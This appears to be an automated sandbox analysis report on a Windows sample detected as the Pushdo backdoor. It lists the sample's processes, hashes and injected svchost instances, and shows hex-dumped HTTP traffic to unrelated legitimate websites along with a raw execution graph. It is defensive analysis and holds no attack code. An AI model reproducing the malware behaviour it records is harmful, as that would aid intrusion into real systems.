                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC845INData Raw: 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 0d 0a 32 30 30 30 0d 0a 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65
                                                                                                                                                                                                                                                        Data Ascii: </section></div>... topnews. -->... content --><div id="content"> ... content-left --> <article id="w2000txt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci</h2> ... opcje
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC861INData Raw: 64 6f 70 61 6c 61 63 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 64 6f 70 61 6c 61 63 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 0d 0a 31 30 30 30 0d 0a 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 31 32 37 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77
                                                                                                                                                                                                                                                        Data Ascii: dopalacze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" alt="dopalacze" aria-hidden="true" /></a>1000</div><div class="item" style="width:300px; height:127px;margin-bottom:10px"><a href="/w
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC877INData Raw: 7a 20 73 65 72 77 69 73 75 20 4b 50 50 20 50 6c 65 73 7a 65 77 2e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 34 36 36 31 36 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 5a 61 70 6f 7a 6e 61 6a 20 73 69 c4 99 20 7a 20 7a 61 73 61 64 61 6d 69 3c 2f 61 3e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 0d 0a 32 62 36 0d 0a 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 35 39 34 38 35 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 50 6f 6c 69 74 79 6b 61 20 70 72 79 77 61 74 6e 6f c5 9b 63 69 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: z serwisu KPP Pleszew.<br/> <a href="https://policja.pl/pol/wolnytekst/46616,dok.html">Zapoznaj si z zasadami</a><br/> <a href="https:/2b6/policja.pl/pol/wolnytekst/59485,dok.html">Polityka prywatnoci</a>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        8192.168.2.35015694.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1342OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1342INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:50:59 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:50:59 UTC1342INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        9192.168.2.350200172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1503OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1791INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:51:00 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        location: https://www.clinicasanluis.com.co/
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hhq22pJu6N4otPAOnqQD2VNjuK%2BQVANgOJWSq4befIeoetH0YUUgfyN2e8sVGOIHJ2DxHQDC60UwDCdNyMFCjal5l6Yo5g6b%2FsIsZI5zj%2B40q9pEMv2YKxSbUbN1ow9yb10DUdvz%2BVU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 8137188addda7eba-LAX
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1791INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c
                                                                                                                                                                                                                                                        Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1792INData Raw: 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ml>
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1792INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:15:49:53
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\EwK95WVtzI.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\EwK95WVtzI.exe
                                                                                                                                                                                                                                                        Imagebase:0x500000
                                                                                                                                                                                                                                                        File size:295'424 bytes
                                                                                                                                                                                                                                                        MD5 hash:F96C1D0ACCEC84AB6DDCA3C0BAFC6CBC
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                        Start time:15:50:12
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                        Imagebase:0x560000
                                                                                                                                                                                                                                                        File size:295'424 bytes
                                                                                                                                                                                                                                                        MD5 hash:F96C1D0ACCEC84AB6DDCA3C0BAFC6CBC
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                        Start time:15:50:16
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                        Start time:15:50:32
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                        Start time:15:50:51
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                        Start time:15:50:51
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                        Start time:15:50:51
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                        Start time:15:50:52
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                        Start time:15:51:11
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                        Start time:15:51:21
                                                                                                                                                                                                                                                        Start date:09/10/2023
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        Imagebase:0xa20000
                                                                                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:13.7%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:39.6%
                                                                                                                                                                                                                                                          Signature Coverage:19.5%
                                                                                                                                                                                                                                                          Total number of Nodes:1950
                                                                                                                                                                                                                                                          Total number of Limit Nodes:90
                                                                                                                                                                                                                                                          execution_graph 12950 509f53 12951 509f5b pre_c_initialization 12950->12951 12968 50c0a3 12951->12968 12953 509f66 pre_c_initialization 12973 50a8b6 12953->12973 12955 509fef 12956 50a338 ___scrt_fastfail 4 API calls 12955->12956 12958 509ff6 ___scrt_initialize_default_local_stdio_options 12956->12958 12957 509f7b __RTC_Initialize 12957->12955 12978 50aa57 12957->12978 12960 509f94 pre_c_initialization 12960->12955 12961 509fa5 12960->12961 12981 50ab15 InitializeSListHead 12961->12981 12963 509faa pre_c_initialization 12982 50ab21 12963->12982 12965 509fcd pre_c_initialization 12988 5096c3 12965->12988 12967 509fd8 pre_c_initialization 12969 50c0b2 12968->12969 12970 50c0d5 12968->12970 12969->12970 12971 5062bc _free 20 API calls 12969->12971 12970->12953 12972 50c0c5 pre_c_initialization 12971->12972 12972->12953 12974 50a8c4 12973->12974 12977 50a8c9 ___scrt_initialize_onexit_tables 12973->12977 12975 50a338 ___scrt_fastfail 4 API calls 12974->12975 12974->12977 12976 50a94c 12975->12976 12977->12957 12993 50aa1c 12978->12993 12981->12963 13031 50c22f 12982->13031 12984 50ab32 12985 50ab39 12984->12985 12986 50a338 ___scrt_fastfail 4 API calls 12984->12986 12985->12965 12987 50ab41 12986->12987 12989 5069e4 pre_c_initialization 35 API calls 12988->12989 12990 5096ce 12989->12990 12991 5062bc _free 20 API calls 12990->12991 12992 5096fb pre_c_initialization 12990->12992 12991->12992 12992->12967 12994 50aa40 12993->12994 12995 50aa39 12993->12995 13002 509c09 12994->13002 12999 509b99 12995->12999 12998 50aa3e 12998->12960 13000 509c09 __onexit 23 API calls 12999->13000 13001 509bab 13000->13001 13001->12998 13005 509910 13002->13005 13008 509846 13005->13008 13007 509934 13007->12998 13009 509852 ___scrt_is_nonwritable_in_current_image 13008->13009 13016 507c63 EnterCriticalSection 13009->13016 13011 509860 13017 509a58 13011->13017 13013 50986d 13027 50988b 13013->13027 13015 50987e ___scrt_is_nonwritable_in_current_image 13015->13007 13016->13011 13018 509a76 13017->13018 13025 509a6e try_get_function 13017->13025 13019 509acf 13018->13019 13020 509e06 __onexit 23 API calls 13018->13020 13018->13025 13021 509e06 __onexit 23 API calls 13019->13021 13019->13025 13022 509ac5 13020->13022 13023 509ae5 13021->13023 13024 5073bc _free 20 API calls 13022->13024 13026 5073bc _free 20 API calls 13023->13026 13024->13019 13025->13013 13026->13025 13030 507cab LeaveCriticalSection 13027->13030 13029 509895 13029->13015 13030->13029 13032 50c24d pre_c_initialization 13031->13032 13034 50c263 pre_c_initialization 13031->13034 13033 5062bc _free 20 API calls 13032->13033 13033->13034 13034->12984 12613 5068cf 12614 5068da 12613->12614 12615 5068ea 12613->12615 12619 5068f0 12614->12619 12618 5073bc _free 20 API calls 12618->12615 12620 506903 12619->12620 12621 506909 12619->12621 12622 5073bc _free 20 API calls 12620->12622 12623 5073bc _free 20 API calls 12621->12623 12622->12621 12624 506915 12623->12624 12625 5073bc _free 20 API calls 12624->12625 12626 506920 12625->12626 12627 5073bc _free 20 API calls 12626->12627 12628 50692b 12627->12628 12629 5073bc _free 20 API calls 12628->12629 12630 506936 12629->12630 12631 5073bc _free 20 API calls 12630->12631 12632 506941 12631->12632 12633 5073bc _free 20 API calls 12632->12633 12634 50694c 12633->12634 12635 5073bc _free 20 API calls 12634->12635 12636 506957 12635->12636 12637 5073bc _free 20 API calls 12636->12637 12638 506962 12637->12638 12639 5073bc _free 20 API calls 12638->12639 12640 506970 12639->12640 12645 5067b6 12640->12645 12651 5066c2 12645->12651 12647 5067da 12648 506806 12647->12648 12664 506723 12648->12664 12650 50682a 12650->12618 12652 5066ce ___scrt_is_nonwritable_in_current_image 12651->12652 12659 507c63 EnterCriticalSection 12652->12659 12654 506702 12660 506717 12654->12660 12656 50670f ___scrt_is_nonwritable_in_current_image 12656->12647 12657 5066d8 12657->12654 12658 5073bc _free 20 API calls 12657->12658 12658->12654 12659->12657 12663 507cab LeaveCriticalSection 12660->12663 12662 506721 12662->12656 12663->12662 12665 50672f ___scrt_is_nonwritable_in_current_image 12664->12665 12672 507c63 EnterCriticalSection 12665->12672 12667 506739 12668 506999 pre_c_initialization 20 API calls 12667->12668 12669 50674c 12668->12669 12673 506762 12669->12673 12671 50675a ___scrt_is_nonwritable_in_current_image 12671->12650 12672->12667 12676 507cab LeaveCriticalSection 12673->12676 12675 50676c 12675->12671 12676->12675 12451 509671 12452 50967d ___scrt_is_nonwritable_in_current_image 12451->12452 12453 5096b4 ___scrt_is_nonwritable_in_current_image 12452->12453 12459 507c63 EnterCriticalSection 12452->12459 12455 509691 12456 507bd2 __fassign 20 API calls 12455->12456 12457 5096a1 12456->12457 12460 5096ba 12457->12460 12459->12455 12463 507cab LeaveCriticalSection 12460->12463 12462 5096c1 12462->12453 12463->12462 13397 50d3e1 13407 50da23 13397->13407 13401 50d3ee 13420 50dba4 13401->13420 13404 50d418 13405 5073bc _free 20 API calls 13404->13405 13406 50d423 13405->13406 13424 50da2c 13407->13424 13409 50d3e9 13410 50db04 13409->13410 13411 50db10 ___scrt_is_nonwritable_in_current_image 13410->13411 13444 507c63 EnterCriticalSection 13411->13444 13413 50db86 13456 50db9b 13413->13456 13414 50db1b 13414->13413 13416 50db5a DeleteCriticalSection 13414->13416 13445 50e91c 13414->13445 13419 5073bc _free 20 API calls 13416->13419 13417 50db92 ___scrt_is_nonwritable_in_current_image 13417->13401 13419->13414 13421 50dbba 13420->13421 13422 50d3fd DeleteCriticalSection 13420->13422 13421->13422 13423 5073bc _free 20 API calls 13421->13423 13422->13401 13422->13404 13423->13422 13425 50da38 ___scrt_is_nonwritable_in_current_image 13424->13425 13434 507c63 EnterCriticalSection 13425->13434 13427 50dadb 13439 50dafb 13427->13439 13430 50dae7 ___scrt_is_nonwritable_in_current_image 13430->13409 13432 50d9dc 63 API calls 13433 50da47 13432->13433 13433->13427 13433->13432 13435 50d42d EnterCriticalSection 13433->13435 13436 50dad1 13433->13436 13434->13433 13435->13433 13442 50d441 LeaveCriticalSection 13436->13442 13438 50dad9 13438->13433 13443 507cab LeaveCriticalSection 13439->13443 13441 50db02 13441->13430 13442->13438 13443->13441 13444->13414 13446 50e928 ___scrt_is_nonwritable_in_current_image 13445->13446 13447 50e939 13446->13447 13448 50e94e 13446->13448 13449 5062bc _free 20 API calls 13447->13449 13455 50e93e pre_c_initialization ___scrt_is_nonwritable_in_current_image 13448->13455 13459 50d42d EnterCriticalSection 13448->13459 13449->13455 13451 50e96a 13460 50e8a6 13451->13460 13453 50e975 13474 50e992 13453->13474 13455->13414 13708 507cab LeaveCriticalSection 13456->13708 13458 50dba2 13458->13417 13459->13451 13461 50e8b3 13460->13461 13462 50e8c8 13460->13462 13463 5062bc _free 20 API calls 13461->13463 13466 50e8b8 pre_c_initialization 13462->13466 13477 50d976 13462->13477 13463->13466 13466->13453 13467 50dba4 20 API calls 13468 50e8e4 13467->13468 13483 50d2f3 13468->13483 13470 50e8ea 13488 50edaa 13470->13488 13472 50e8f0 13472->13466 13473 5073bc _free 20 API calls 13472->13473 13473->13466 13707 50d441 LeaveCriticalSection 13474->13707 13476 50e99a 13476->13455 13478 50d98a 13477->13478 13479 50d98e 13477->13479 13478->13467 13479->13478 13480 50d2f3 20 API calls 13479->13480 13481 50d9ae 13480->13481 13501 50e2a1 13481->13501 13484 50d314 13483->13484 13485 50d2ff 13483->13485 13484->13470 13486 5062bc _free 20 API calls 13485->13486 13487 50d304 pre_c_initialization 13486->13487 13487->13470 13489 50edb9 13488->13489 13490 50edce 13488->13490 13492 5062a9 __dosmaperr 20 API calls 13489->13492 13491 50ee09 13490->13491 13495 50edf5 13490->13495 13493 5062a9 __dosmaperr 20 API calls 13491->13493 13494 50edbe 13492->13494 13496 50ee0e 13493->13496 13497 5062bc _free 20 API calls 13494->13497 13664 50ed82 13495->13664 13499 5062bc _free 20 API calls 13496->13499 13500 50edc6 pre_c_initialization 13497->13500 13499->13500 13500->13472 13502 50e2ad ___scrt_is_nonwritable_in_current_image 13501->13502 13503 50e2b5 13502->13503 13504 50e2cd 13502->13504 13524 5062a9 13503->13524 13505 50e36b 13504->13505 13509 50e302 13504->13509 13507 5062a9 __dosmaperr 20 API calls 13505->13507 13510 50e370 13507->13510 13527 50c99a EnterCriticalSection 13509->13527 13513 5062bc _free 20 API calls 13510->13513 13511 5062bc _free 20 API calls 13520 50e2c2 pre_c_initialization ___scrt_is_nonwritable_in_current_image 13511->13520 13513->13520 13514 50e308 13515 50e324 13514->13515 13516 50e339 13514->13516 13517 5062bc _free 20 API calls 13515->13517 13528 50e38c 13516->13528 13519 50e329 13517->13519 13522 5062a9 __dosmaperr 20 API calls 13519->13522 13520->13478 13521 50e334 13575 50e363 13521->13575 13522->13521 13525 506a68 _free 20 API calls 13524->13525 13526 5062ae 13525->13526 13526->13511 